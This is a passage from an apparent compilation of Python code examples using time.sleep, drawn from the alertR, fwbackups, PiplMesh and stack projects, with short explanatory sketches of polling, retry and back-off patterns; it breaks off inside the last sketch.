					self.sensorAlert.dataType = tempDataType
					self.sensorAlert.sensorData = tempSensorData
					self.shouldForceSendAlert = True
					self.forceSendAlertLock.release()

				# Type: invalid
				else:
					raise ValueError("Received invalid message type.")

			except Exception as e:
				logging.exception("[%s]: Could not parse received data from "
					% self.fileName
					+ "FIFO file of sensor with id '%d'."
					% self.id)
				continue
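
The sensor thread above handles every FIFO error the same way: log the exception, sleep for ten seconds, and continue with the next iteration of the outer loop, which amounts to a retry loop with a fixed delay. The sketch below shows that pattern in isolation; attempt_io and retry_delay are hypothetical names and the function is not part of alertR.

import time

def retry_forever(attempt_io, retry_delay=10):
    # Keep calling attempt_io(); on failure, wait a fixed delay and try again.
    while True:
        try:
            return attempt_io()
        except Exception as exc:
            print("attempt failed (%s), retrying in %d seconds" % (exc, retry_delay))
            time.sleep(retry_delay)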

Example 18

Project: fwbackups
Source File: backup.py
View license
  def backupPaths(self, paths, command):
    """Does the actual copying dirty work"""
    # this is in common
    self._current = 0
    if len(paths) == 0:
      return True
    self._total = len(paths)
    self._status = STATUS_BACKING_UP
    wasAnError = False
    if self.options['Engine'] == 'tar':
      if MSWINDOWS:
        self.logger.logmsg('INFO', _('Using %s on Windows: Cancel function will only take effect after a path has been completed.' % self.options['Engine']))
        import tarfile
        fh = tarfile.open(self.dest, 'w')
        for i in paths:
          self.ifCancel()
          self._current += 1
          self.logger.logmsg('DEBUG', _('Backing up path %(a)i/%(b)i: %(c)s' % {'a': self._current, 'b': self._total, 'c': i}))
          fh.add(i, recursive=self.options['Recursive'])
        fh.close()
      else: # not MSWINDOWS
        for i in paths:
          i = fwbackups.escapeQuotes(i, 1)
          self.ifCancel()
          self._current += 1
          self.logger.logmsg('DEBUG', _("Running command: nice -n %(a)i %(b)s '%(c)s'" % {'a': self.options['Nice'], 'b': command, 'c': i}))
          sub = fwbackups.executeSub("nice -n %i %s '%s'" % (self.options['Nice'], command, i), env=self.environment, shell=True)
          self.pids.append(sub.pid)
          self.logger.logmsg('DEBUG', _('Starting subprocess with PID %s') % sub.pid)
          # track stdout
          errors = []
          # use nonblocking I/O
          fl = fcntl.fcntl(sub.stderr, fcntl.F_GETFL)
          fcntl.fcntl(sub.stderr, fcntl.F_SETFL, fl | os.O_NONBLOCK)
          while sub.poll() in ["", None]:
            time.sleep(0.01)
            try:
              errors += sub.stderr.readline()
            except IOError, description:
              pass
          self.pids.remove(sub.pid)
          retval = sub.poll()
          self.logger.logmsg('DEBUG', _('Subprocess with PID %(a)s exited with status %(b)s' % {'a': sub.pid, 'b': retval}))
          # Something wrong?
          if retval != EXIT_STATUS_OK and retval != 2:
            wasAnError = True
            self.logger.logmsg('ERROR', 'An error occurred while backing up path \'%s\'.\nPlease check the error output below to determine if any files are incomplete or missing.' % str(i))
            self.logger.logmsg('ERROR', _('Process exited with status %(a)s. Errors: %(b)s' % {'a': retval, 'b': ''.join(errors)}))

    elif self.options['Engine'] == 'tar.gz':
      self._total = 1
      if MSWINDOWS:
        self.logger.logmsg('INFO', _('Using %s on Windows: Cancel function will only take effect after a path has been completed.' % self.options['Engine']))
        import tarfile
        fh = tarfile.open(self.dest, 'w:gz')
        for i in paths:
          self._current += 1
          self.ifCancel()
          self.logger.logmsg('DEBUG', _('Backing up path %(a)i/%(b)i: %(c)s' % {'a': self._current, 'b': self._total, 'c': i}))
          fh.add(i, recursive=self.options['Recursive'])
          self.logger.logmsg('DEBUG', _('Adding path `%s\' to the archive' % i))
        fh.close()
      else: # not MSWINDOWS
        self._current = 1
        escapedPaths = [fwbackups.escapeQuotes(i, 1) for i in paths]
        # This is a fancy way of getting i = "'one' 'two' 'three'"
        i = "'%s'" % "' '".join(escapedPaths)
        self.logger.logmsg('INFO', _('Using %s: Must backup all paths at once - Progress notification will be disabled.' % self.options['Engine']))
        self.logger.logmsg('DEBUG', _('Backing up path %(a)i/%(b)i: %(c)s') % {'a': self._current, 'b': self._total, 'c': i.replace("'", '')})
        self.logger.logmsg('DEBUG', _("Running command: nice -n %(a)i %(b)s %(c)s" % {'a': self.options['Nice'], 'b': command, 'c': i}))
        # Don't wrap i in quotes; we already did this above when merging the paths
        sub = fwbackups.executeSub("nice -n %i %s %s" % (self.options['Nice'], command, i), env=self.environment, shell=True)
        self.pids.append(sub.pid)
        self.logger.logmsg('DEBUG', _('Starting subprocess with PID %s') % sub.pid)
        # track stdout
        errors = []
        # use nonblocking I/O
        fl = fcntl.fcntl(sub.stderr, fcntl.F_GETFL)
        fcntl.fcntl(sub.stderr, fcntl.F_SETFL, fl | os.O_NONBLOCK)
        while sub.poll() in ["", None]:
          time.sleep(0.01)
          try:
            errors += sub.stderr.readline()
          except IOError, description:
            pass
        self.pids.remove(sub.pid)
        retval = sub.poll()
        self.logger.logmsg('DEBUG', _('Subprocess with PID %(a)s exited with status %(b)s' % {'a': sub.pid, 'b': retval}))
        # Something wrong?
        if retval != EXIT_STATUS_OK and retval != 2:
          wasAnError = True
          self.logger.logmsg('ERROR', 'An error occurred while backing up path \'%s\'.\nPlease check the error output below to determine if any files are incomplete or missing.' % str(i))
          self.logger.logmsg('ERROR', _('Process exited with status %(a)s. Errors: %(b)s' % {'a': retval, 'b': ''.join(errors)}))

    elif self.options['Engine'] == 'tar.bz2':
      self._total = 1
      if MSWINDOWS:
        self.logger.logmsg('INFO', _('Using %s on Windows: Cancel function will only take effect after a path has been completed.' % self.options['Engine']))
        import tarfile
        fh = tarfile.open(self.dest, 'w:bz2')
        for i in paths:
          self._current += 1
          self.ifCancel()
          self.logger.logmsg('DEBUG', _('Backing up path %(a)i/%(b)i: %(c)s' % {'a': self._current, 'b': self._total, 'c': i}))
          fh.add(i, recursive=self.options['Recursive'])
          self.logger.logmsg('DEBUG', _('Adding path `%s\' to the archive' % i))
        fh.close()
      else: # not MSWINDOWS
        self._current = 1
        escapedPaths = [fwbackups.escapeQuotes(i, 1) for i in paths]
        # This is a fancy way of getting i = "'one' 'two' 'three'"
        i = "'%s'" % "' '".join(escapedPaths)
        self.logger.logmsg('INFO', _('Using %s: Must backup all paths at once - Progress notification will be disabled.' % self.options['Engine']))
        self.logger.logmsg('DEBUG', _('Backing up path %(a)i/%(b)i: %(c)s') % {'a': self._current, 'b': self._total, 'c': i})
        self.logger.logmsg('DEBUG', _("Running command: nice -n %(a)i %(b)s %(c)s" % {'a': self.options['Nice'], 'b': command, 'c': i}))
        # Don't wrap i in quotes; we already did this above when merging the paths
        sub = fwbackups.executeSub("nice -n %i %s %s" % (self.options['Nice'], command, i), env=self.environment, shell=True)
        self.pids.append(sub.pid)
        self.logger.logmsg('DEBUG', _('Starting subprocess with PID %s') % sub.pid)
        # track stdout
        errors = []
        # use nonblocking I/O
        fl = fcntl.fcntl(sub.stderr, fcntl.F_GETFL)
        fcntl.fcntl(sub.stderr, fcntl.F_SETFL, fl | os.O_NONBLOCK)
        while sub.poll() in ["", None]:
          time.sleep(0.01)
          try:
            errors += sub.stderr.readline()
          except IOError, description:
            pass
        self.pids.remove(sub.pid)
        retval = sub.poll()
        self.logger.logmsg('DEBUG', _('Subprocess with PID %(a)s exited with status %(b)s' % {'a': sub.pid, 'b': retval}))
        # Something wrong?
        if retval != EXIT_STATUS_OK and retval != 2:
          wasAnError = True
          self.logger.logmsg('ERROR', 'An error occurred while backing up path \'%s\'.\nPlease check the error output below to determine if any files are incomplete or missing.' % str(i))
          self.logger.logmsg('ERROR', _('Process exited with status %(a)s. Errors: %(b)s' % {'a': retval, 'b': ''.join(errors)}))

    elif self.options['Engine'] == 'rsync':
      # in this case, self.{folderdest,dest} both need to be created
      if self.options['DestinationType'] == 'remote (ssh)':
        client, sftpClient = sftp.connect(self.options['RemoteHost'], self.options['RemoteUsername'], self.options['RemotePassword'], self.options['RemotePort'])
        if not wasAnError:
          for i in paths:
            if self.toCancel:
              # Check if we need to cancel in between paths
              # If so, break and close the SFTP session
              # Immediately after, self.ifCancel() is run.
              break
            self._current += 1
            self.logger.logmsg('DEBUG', _('Backing up path %(a)i/%(b)i: %(c)s') % {'a': self._current, 'b': self._total, 'c': i})
            if not os.path.exists(encode(i)):
              self.logger.logmsg('WARNING', _("Path %s is missing or cannot be read and will be excluded from the backup.") % i)
            sftp.put(sftpClient, encode(i), encode(os.path.normpath(self.options['RemoteFolder']+os.sep+os.path.basename(self.dest)+os.sep+os.path.dirname(i))), symlinks=not self.options['FollowLinks'], excludes=encode(self.options['Excludes'].split('\n')))
        sftpClient.close()
        client.close()
      else: # destination is local
        for i in paths:
          self.ifCancel()
          self._current += 1
          if MSWINDOWS:
            # let's deal with real paths
            self.logger.logmsg('DEBUG', _('Backing up path %(a)i/%(b)i: %(c)s' % {'a': self._current, 'b': self._total, 'c': i}))
            shutil_modded.copytree_fullpaths(encode(i), encode(self.dest))
          else: # not MSWINDOWS; UNIX/OS X can call rsync binary
            i = fwbackups.escapeQuotes(i, 1)
            self.logger.logmsg('DEBUG', _("Running command: nice -n %(a)i %(b)s %(c)s '%(d)s'" % {'a': self.options['Nice'], 'b': command, 'c': i, 'd': fwbackups.escapeQuotes(self.dest, 1)}))
            sub = fwbackups.executeSub("nice -n %i %s '%s' '%s'" % (self.options['Nice'], command, i, fwbackups.escapeQuotes(self.dest, 1)), env=self.environment, shell=True)
            self.pids.append(sub.pid)
            self.logger.logmsg('DEBUG', _('Starting subprocess with PID %s') % sub.pid)
            # track stdout
            errors = []
            # use nonblocking I/O
            fl = fcntl.fcntl(sub.stderr, fcntl.F_GETFL)
            fcntl.fcntl(sub.stderr, fcntl.F_SETFL, fl | os.O_NONBLOCK)
            while sub.poll() in ["", None]:
              time.sleep(0.01)
              try:
                errors += sub.stderr.readline()
              except IOError, description:
                pass
            self.pids.remove(sub.pid)
            retval = sub.poll()
            self.logger.logmsg('DEBUG', _('Subprocess with PID %(a)s exited with status %(b)s' % {'a': sub.pid, 'b': retval}))
            # Something wrong?
            if retval not in [EXIT_STATUS_OK, 2]:
              wasAnError = True
              self.logger.logmsg('ERROR', 'An error occurred while backing up path \'%s\'.\nPlease check the error output below to determine if any files are incomplete or missing.' % str(i))
              self.logger.logmsg('ERROR', _('Process exited with status %(a)s. Errors: %(b)s' % {'a': retval, 'b': ''.join(errors)}))

    self.ifCancel()
    # A test is included to ensure the archive actually exists, since if
    # wasAnError is True the archive might not even exist.
    if self.options['Engine'].startswith('tar') and self.options['DestinationType'] == 'remote (ssh)' and os.path.exists(encode(self.dest)):
      self.logger.logmsg('DEBUG', _('Sending files to server via SFTP'))
      self._status = STATUS_SENDING_TO_REMOTE
      client, sftpClient = sftp.connect(self.options['RemoteHost'], self.options['RemoteUsername'], self.options['RemotePassword'], self.options['RemotePort'])
      try:
        sftp.putFile(sftpClient, self.dest, self.options['RemoteFolder'])
        os.remove(self.dest)
      except:
        import sys
        import traceback
        wasAnError = True
        self.logger.logmsg('DEBUG', _('Could not send file(s) or folder to server:'))
        (etype, value, tb) = sys.exc_info()
        self.logger.logmsg('DEBUG', ''.join(traceback.format_exception(etype, value, tb)))
      sftpClient.close()
      client.close()

    # Finally, mark progress as complete
    self._current = self._total
    time.sleep(1)
    self.ifCancel()
    return (not wasAnError)
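
The loop above illustrates a common pattern: rather than blocking on the child process, fwbackups polls it with a 10 ms time.sleep between checks while draining stderr through a non-blocking pipe (subprocess.Popen.poll() returns None while the child is still running). Below is a minimal, self-contained sketch of that pattern, assuming a Unix-like system (fcntl); the run_and_poll name, the shell-command handling, and the 4096-byte read size are illustrative choices, not fwbackups' actual wrapper.

import fcntl
import os
import subprocess
import time

def run_and_poll(command):
    # Launch the command and make its stderr pipe non-blocking.
    sub = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE)
    fd = sub.stderr.fileno()
    flags = fcntl.fcntl(fd, fcntl.F_GETFL)
    fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)

    errors = []
    while sub.poll() is None:           # poll() returns None while running
        time.sleep(0.01)                # short sleep instead of a busy-wait
        try:
            chunk = os.read(fd, 4096)   # raises OSError if nothing is ready
            if chunk:
                errors.append(chunk)
        except OSError:
            pass
    return sub.returncode, b''.join(errors)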

Example 19

Project: PiplMesh
Source File: test_basic.py
View license
    def test_basic(self):
        # Creating a post

        response = self.client.post(self.resourceListURI('post'), '{"message": "Test post."}', content_type='application/json')
        self.assertEqual(response.status_code, 201)

        post_uri = response['location']

        response = self.client.get(post_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['message'], 'Test post.')
        self.assertEqual(response['author']['username'], self.user_username)
        self.assertNotEqual(response['created_time'], None)
        self.assertNotEqual(response['updated_time'], None)
        self.assertEqual(response['comments'], [])
        self.assertEqual(response['attachments'], [])
        self.assertEqual(response['is_published'], False)

        post_created_time = response['created_time']
        post_updated_time = response['updated_time']

        # Delay so the next update time is guaranteed to differ
        time.sleep(1)

        # Test authorization
        response = self.client2.get(post_uri, content_type='application/json')
        self.assertEqual(response.status_code, 404)

        # Adding an attachment

        attachments_resource_uri = self.fullURItoAbsoluteURI(post_uri) + 'attachments/'

        response = self.client.post(attachments_resource_uri, '{"link_url": "http://wlan-si.net/", "link_caption": "wlan slovenija"}', content_type='application/json; type=link')
        self.assertEqual(response.status_code, 201)

        attachment_uri = response['location']

        response = self.client.get(attachment_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['link_url'], 'http://wlan-si.net/')
        self.assertEqual(response['link_caption'], 'wlan slovenija')
        self.assertEqual(response['link_description'], '')
        self.assertEqual(response['author']['username'], self.user_username)

        response = self.client.get(post_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['attachments'][0]['link_url'], 'http://wlan-si.net/')
        self.assertEqual(response['attachments'][0]['link_caption'], 'wlan slovenija')
        self.assertEqual(response['attachments'][0]['link_description'], '')
        self.assertEqual(response['created_time'], post_created_time)
        self.assertNotEqual(response['updated_time'], post_updated_time)

        post_updated_time = response['updated_time']

        # Delay so the next update time is guaranteed to differ
        time.sleep(1)

        # Publishing a post

        response = self.client.patch(post_uri, '{"is_published": true}', content_type='application/json')
        self.assertEqual(response.status_code, 202)

        response = self.client.get(post_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['is_published'], True)
        
        # Test authorization
        response = self.client2.get(post_uri, content_type='application/json')
        self.assertEqual(response.status_code, 200)

        # Checking updates

        self.assertEqual(len(self.updates_data), 1)
        self.assertEqual(self.updates_data[0]['channel_id'], tasks.HOME_CHANNEL_ID)
        self.assertTrue(self.updates_data[0]['already_serialized'])

        post = json.loads(self.updates_data[0]['data'])

        self.assertEqual(post['type'], 'post_published')
        self.assertEqual(post['post']['message'], 'Test post.')
        self.assertEqual(post['post']['author']['username'], self.user_username)
        self.assertEqual(post['post']['comments'], [])
        self.assertEqual(post['post']['attachments'][0]['link_url'], 'http://wlan-si.net/')
        self.assertEqual(post['post']['attachments'][0]['link_caption'], 'wlan slovenija')
        self.assertEqual(post['post']['attachments'][0]['link_description'], '')
        self.assertEqual(post['post']['created_time'], post_created_time)
        self.assertEqual(post['post']['is_published'], True)

        # Adding a comment

        comments_resource_uri = self.fullURItoAbsoluteURI(post_uri) + 'comments/'

        response = self.client.post(comments_resource_uri, '{"message": "Test comment."}', content_type='application/json')
        self.assertEqual(response.status_code, 201)

        comment_uri = response['location']

        response = self.client.get(comment_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['message'], 'Test comment.')
        self.assertEqual(response['author']['username'], self.user_username)

        response = self.client.get(post_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['comments'][0], self.fullURItoAbsoluteURI(comment_uri))
        self.assertEqual(response['created_time'], post_created_time)
        self.assertNotEqual(response['updated_time'], post_updated_time)

        post_updated_time = response['updated_time']

        # Delay so the next update time is guaranteed to differ
        time.sleep(1)

        # Adding hug on post

        hugs_resource_uri = self.fullURItoAbsoluteURI(post_uri) + 'hugs/'

        response = self.client.post(hugs_resource_uri, content_type='application/json')
        self.assertEqual(response.status_code, 201)

        hug_uri = response['location']

        response = self.client.get(hug_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['author']['username'], self.user_username)

        response = self.client.get(post_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['hugs'][0]['resource_uri'], self.fullURItoAbsoluteURI(hug_uri))
        self.assertEqual(response['created_time'], post_created_time)
        self.assertNotEqual(response['updated_time'], post_updated_time)

        post_updated_time = response['updated_time']

        # Delay so the next update time is guaranteed to differ
        time.sleep(1)

        # Adding run on post

        runs_resource_uri = self.fullURItoAbsoluteURI(post_uri) + 'runs/'

        response = self.client.post(runs_resource_uri, content_type='application/json')
        self.assertEqual(response.status_code, 201)

        run_uri = response['location']

        response = self.client.get(run_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['author']['username'], self.user_username)

        response = self.client.get(post_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['runs'][0]['resource_uri'], self.fullURItoAbsoluteURI(run_uri))
        self.assertEqual(response['created_time'], post_created_time)
        self.assertNotEqual(response['updated_time'], post_updated_time)

        self.assertEqual(response['hugs'], [])

        previous_runs = response['runs']

        post_updated_time = response['updated_time']

        # Delay so the next update time is guaranteed to differ
        time.sleep(1)


        # Adding another hug on post by client 2

        hugs_resource_uri = self.fullURItoAbsoluteURI(post_uri) + 'hugs/'

        response = self.client2.post(hugs_resource_uri, content_type='application/json')
        self.assertEqual(response.status_code, 201)

        hug_uri = response['location']

        response = self.client2.get(hug_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['author']['username'], self.user_username2)

        response = self.client2.get(post_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['runs'], previous_runs)

        self.assertEqual(response['hugs'][0]['resource_uri'], self.fullURItoAbsoluteURI(hug_uri))
        self.assertEqual(response['created_time'], post_created_time)
        self.assertNotEqual(response['updated_time'], post_updated_time)

        post_updated_time = response['updated_time']

        # Delay so the next update time is guaranteed to differ
        time.sleep(1)
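
Each one-second time.sleep in this test exists because the post's created_time and updated_time are compared directly: if two writes land within the same clock resolution, updated_time would not change and the assertNotEqual checks could fail intermittently. A tiny sketch of the underlying issue, assuming a field stored at one-second resolution (the helper name is hypothetical and not part of the PiplMesh suite):

import time
from datetime import datetime

def second_resolution_timestamp():
    # Mimic a timestamp field that is only stored to whole seconds.
    return datetime.utcnow().replace(microsecond=0)

first = second_resolution_timestamp()
time.sleep(1)          # guarantee the next reading falls in a later second
second = second_resolution_timestamp()
assert second > first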

Example 20

Project: stack
Source File: ThreadedCollector.py
View license
def go(collection_type, project_id, collector_id, rawdir, logdir):
    if collection_type not in ['track', 'follow', 'none']:
        print "ThreadedCollector accepts inputs 'track', 'follow', or 'none'."
        print 'Exiting with invalid params...'
        sys.exit()
    else:
        # Grab collector & project details from DB
        project = db.get_project_detail(project_id)
        resp = db.get_collector_detail(project_id, collector_id)

        if project['status'] and resp['status']:
            collector = resp['collector']
            configdb = project['project_config_db']
            project_config_db = db.connection[configdb]
            project_config_db = project_config_db.config
            collector_name = collector['collector_name']
            project_name = project['project_name']
        else:
            print 'Invalid project account & collector. Try again!'
            sys.exit()

    # module_config = project_config_db.find_one({'module': 'twitter'})

    # Reference for controller if script is active or not.
    project_config_db.update({'_id': ObjectId(collector_id)}, {'$set': {'active': 1}})

    Config = ConfigParser.ConfigParser()
    Config.read(PLATFORM_CONFIG_FILE)

    # Creates logger w/ level INFO
    logger = logging.getLogger(collector_name)
    logger.setLevel(logging.INFO)
    # Creates rotating file handler w/ level INFO
    fh = logging.handlers.TimedRotatingFileHandler(logdir + '/' + project_name + '-' + collector_name + '-' + collection_type + '-collector-log-' + collector_id + '.out', 'D', 1, 30, None, False, False)
    fh.setLevel(logging.INFO)
    # Creates formatter and applies to rotating handler
    format = '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'
    datefmt = '%m-%d %H:%M'
    formatter = logging.Formatter(format, datefmt)
    fh.setFormatter(formatter)
    # Finishes by adding the rotating, formatted handler
    logger.addHandler(fh)

    # Sets current date as starting point
    tmpDate = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
    logger.info('Starting collection system at %s' % tmpDate)
    logger.info('Collector name: %s' % collector_name)

    # Grabs tweets out file info from config
    # TODO - move this info to Mongo
    tweetsOutFilePath = rawdir + '/'
    if not os.path.exists(tweetsOutFilePath):
        os.makedirs(tweetsOutFilePath)
    tweetsOutFileDateFrmt = Config.get('files', 'tweets_file_date_frmt', 0)
    tweetsOutFile = Config.get('files', 'tweets_file', 0)

    # NOTE - proper naming for api_auth dictionary from front_end
    oauth_info = collector['api_auth']

    consumerKey = oauth_info['consumer_key']
    consumerSecret = oauth_info['consumer_secret']
    accessToken = oauth_info['access_token']
    accessTokenSecret = oauth_info['access_token_secret']

    # Authenticates via app info
    auth = OAuthHandler(consumerKey, consumerSecret)
    auth.set_access_token(accessToken, accessTokenSecret)

    # Sets Mongo collection; sets rate_limitng & error counts to 0
    if 'stream_limit_loss' not in collector:
        project_config_db.update({'_id': ObjectId(collector_id)}, {'$set' : { 'stream_limit_loss': { 'counts': [], 'total': 0 }}})

    if 'rate_limit_count' not in collector:
        project_config_db.update({'_id': ObjectId(collector_id)}, {'$set': {'rate_limit_count': 0}})

    if 'error_code' not in collector:
        project_config_db.update({"_id" : ObjectId(collector_id)}, {'$set' : {'error_code': 0}})

    runCollector = collector['collector']['run']

    if runCollector:
        print 'Starting process w/ start signal %d' % runCollector
        logger.info('Starting process w/ start signal %d' % runCollector)
    collectingData = False

    i = 0
    myThreadCounter = 0
    runLoopSleep = 0

    while runCollector:
        i += 1

        # Finds Mongo collection & grabs signal info
        # If Mongo is offline, the call raises an exception and the loop continues
        exception = None
        try:
            resp = db.get_collector_detail(project_id, collector_id)
            collector = resp['collector']
            flags = collector['collector']
            runCollector = flags['run']
            collectSignal = flags['collect']
            updateSignal = flags['update']
        except Exception, exception:
            logger.info('Mongo connection refused with exception: %s' % exception)

        """
        Collection process is running, and:
        A) An update has been triggered -OR-
        B) The collection signal is not set -OR-
        C) Run signal is not set
        """
        if collectingData and (updateSignal or not collectSignal or not runCollector):
            # Update has been triggered
            if updateSignal:
                logger.info('MAIN: received UPDATE signal. Attempting to stop collection thread')
                resp = db.set_collector_status(project_id, collector_id, collector_status=1)
            # Collection thread triggered to stop
            if not collectSignal:
                logger.info('MAIN: received STOP signal. Attempting to stop collection thread')
            # Entire process triggered to stop
            if not runCollector:
                logger.info('MAIN: received EXIT signal. Attempting to stop collection thread')
                resp = db.set_collector_status(project_id, collector_id, collector_status=0)
                collectSignal = 0

            # Send stream disconnect signal, kills thread
            stream.disconnect()
            wait_count = 0
            while e.isSet() is False:
                wait_count += 1
                print '%d) Waiting on collection thread shutdown' % wait_count
                sleep(wait_count)

            collectingData = False

            logger.info('COLLECTION THREAD: stream stopped after %d tweets' % l.tweet_count)
            logger.info('COLLECTION THREAD: collected %d error tweets' % l.delete_count)
            print 'COLLECTION THREAD: collected %d error tweets' % l.delete_count
            logger.info('COLLECTION THREAD: lost %d tweets to stream rate limit' % l.limit_count)
            print 'COLLECTION THREAD: lost %d tweets to stream rate limit' % l.limit_count
            print 'COLLECTION THREAD: stream stopped after %d tweets' % l.tweet_count

            if not l.error_code == 0:
                resp = db.set_collector_status(project_id, collector_id, collector_status=0)
                project_config_db.update({"_id" : ObjectId(collector_id)}, {'$set' : {'error_code': l.error_code}})

            if not l.limit_count == 0:
                project_config_db.update({'_id': ObjectId(collector_id)}, {'$set' : { 'stream_limit_loss.total': l.limit_count}})

            if not l.rate_limit_count == 0:
                project_config_db.update({'_id': ObjectId(collector_id)}, {'$set': {'rate_limit_count': 0}})

        # Collection has been signaled & main program thread is running
        # TODO - Check Mongo for handle:ID pairs
        # Only call for new pairs
        if collectSignal and (threading.activeCount() == 1):
            # Names collection thread & adds to counter
            myThreadCounter += 1
            myThreadName = 'collector-' + collection_type + '%s' % myThreadCounter

            termsList = collector['terms_list']
            if termsList:
                print 'Terms list length: ' + str(len(termsList))

                # Grab IDs for follow stream
                if collection_type == 'follow':
                    """
                    TODO - Update Mongo terms w/ set for collect status 0 or 1
                    # Updates current stored handles to collect 0 if no longer listed in terms file
                    stored_terms = doc['termsList']
                    for user in stored_terms:
                        if user['handle'] not in termsList:
                            user_id = user['id']
                            mongo_config.update({'module': 'collector-follow'},
                                {'$pull': {'termsList': {'handle': user['handle']}}})
                            mongo_config.update({'module': 'collecting-follow'},
                                {'$set': {'termsList': {'handle': user['handle'], 'id': user_id, 'collect': 0 }}})

                    # Loops thru current stored handles and adds list if both:
                    #   A) Value isn't set to None (not valid OR no longer in use)
                    all_stored_handles = [user['handle'] for user in stored_terms]
                    stored_handles = [user['handle'] for user in stored_terms if user['id'] and user['collect']]

                    print 'MAIN: %d user ids for collection found in Mongo!' % len(stored_handles)
                    """

                    # Loop thru & query (except handles that have been stored)
                    print 'MAIN: Querying Twitter API for handle:id pairs...'
                    logger.info('MAIN: Querying Twitter API for handle:id pairs...')
                    # Initiates REST API connection
                    twitter_api = API(auth_handler=auth)
                    failed_handles = []
                    success_handles = []
                    # Loops thru user-given terms list
                    for item in termsList:
                        term = item['term']
                        # If term already has a valid ID, pass
                        if item['id'] is not None:
                            pass
                        # Queries the Twitter API for the ID value of the handle
                        else:
                            try:
                                user = twitter_api.get_user(screen_name=term)
                            except TweepError as tweepy_exception:
                                error_message = tweepy_exception.args[0][0]['message']
                                code = tweepy_exception.args[0][0]['code']
                                # Rate limited for 15 minutes w/ code 88
                                if code == 88:
                                    print 'MAIN: User ID grab rate limited. Sleeping for 15 minutes.'
                                    logger.exception('MAIN: User ID grab rate limited. Sleeping for 15 minutes.')
                                    time.sleep(900)
                                # Handle doesn't exist, added to Mongo as None
                                elif code == 34:
                                    print 'MAIN: User w/ handle %s does not exist.' % term
                                    logger.exception('MAIN: User w/ handle %s does not exist.' % term)
                                    item['collect'] = 0
                                    item['id'] = None
                                    failed_handles.append(term)
                            # Success - handle:ID pair stored in Mongo
                            else:
                                user_id = user._json['id_str']
                                item['id'] = user_id
                                success_handles.append(term)

                    print 'MAIN: Collected %d new ids for follow stream.' % len(success_handles)
                    logger.info('MAIN: Collected %d new ids for follow stream.' % len(success_handles))
                    print 'MAIN: %d handles failed to be found.' % len(failed_handles)
                    logger.info('MAIN: %d handles failed to be found.' % len(failed_handles))
                    logger.info(failed_handles)
                    print failed_handles
                    print 'MAIN: Grabbing full list of follow stream IDs from Mongo.'
                    logger.info('MAIN: Grabbing full list of follow stream IDs from Mongo.')

                    # Updates term list with follow values
                    project_config_db.update({'_id': ObjectId(collector_id)},
                        {'$set': {'terms_list': termsList}})

                    # Loops thru current stored handles and adds to list if:
                    #   A) Value isn't set to None (not valid OR no longer in use)
                    ids = [item['id'] for item in termsList if item['id'] and item['collect']]
                    noncoll = [item['term'] for item in termsList if not item['collect']]
                    termsList = ids
                else:
                    terms = [item['term'] for item in termsList if item['collect']]
                    noncoll = [item['term'] for item in termsList if not item['collect']]
                    termsList = terms

                print 'Terms List: '
                print termsList
                print ''
                print 'Not collecting for: '
                print noncoll
                print ''

                logger.info('Terms list: %s' % str(termsList).strip('[]'))
                logger.info('Not collecting for: %s' % str(noncoll).strip('[]'))

            print 'COLLECTION THREAD: Initializing Tweepy listener instance...'
            logger.info('COLLECTION THREAD: Initializing Tweepy listener instance...')
            l = fileOutListener(tweetsOutFilePath, tweetsOutFileDateFrmt, tweetsOutFile, logger, collection_type, project_id, collector_id)

            print 'TOOLKIT STREAM: Initializing Tweepy stream listener...'
            logger.info('TOOLKIT STREAM: Initializing Tweepy stream listener...')

            # Initiates async stream via Tweepy, which handles the threading
            # TODO - location & language

            languages = collector['languages']
            location = collector['location']

            if languages:
                print '%s language codes found!' % len(languages)
            if location:
                print 'Location points found!'
                for i in range(len(location)):
                    location[i] = float(location[i])

            stream = ToolkitStream(auth, l, logger, project_id, collector_id, retry_count=100)
            if collection_type == 'track':
                stream.filter(track=termsList, languages=languages, locations=location, async=True)
            elif collection_type == 'follow':
                stream.filter(follow=termsList, languages=languages, locations=location, async=True)
            elif collection_type == 'none':
                stream.filter(locations=location, languages=languages, async=True)
            else:
                sys.exit('ERROR: Unrecognized stream filter.')

            collectingData = True
            print 'MAIN: Collection thread started (%s)' % myThreadName
            logger.info('MAIN: Collection thread started (%s)' % myThreadName)


        #if threading.activeCount() == 1:
        #    print "MAIN: %d iteration with no collection thread running" % i
        #else:
        #    print "MAIN: %d iteration with collection thread running (%d)" % (i, threading.activeCount())

        # Incrementally delays loop if Mongo is offline, otherwise 2 seconds
        max_sleep_time = 1800
        if exception:
            if runLoopSleep < max_sleep_time:
                runLoopSleep += 2
            else:
                runLoopSleep = max_sleep_time
            print "Exception caught, sleeping for: %d" % runLoopSleep
            time.sleep(runLoopSleep)
        else:
            time.sleep( 2 )

    logger.info('Exiting Collection Program...')
    print 'Exiting Collection Program...'

    # Reference for controller if script is active or not.
    project_config_db.update({'_id': ObjectId(collector_id)}, {'$set': {'active': 0}})
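
At the bottom of the main loop the collector sleeps two seconds per healthy iteration, but if the Mongo lookup raised an exception it lengthens the delay by two seconds each pass, capped at 1800 seconds. A standalone sketch of that capped back-off follows; collector_loop and is_mongo_up are hypothetical stand-ins for the loop body and the db.get_collector_detail call, and unlike the excerpt the sketch runs a fixed number of iterations so it terminates:

import time

MAX_SLEEP_TIME = 1800                      # cap the back-off at 30 minutes

def collector_loop(is_mongo_up, iterations=5):
    run_loop_sleep = 0
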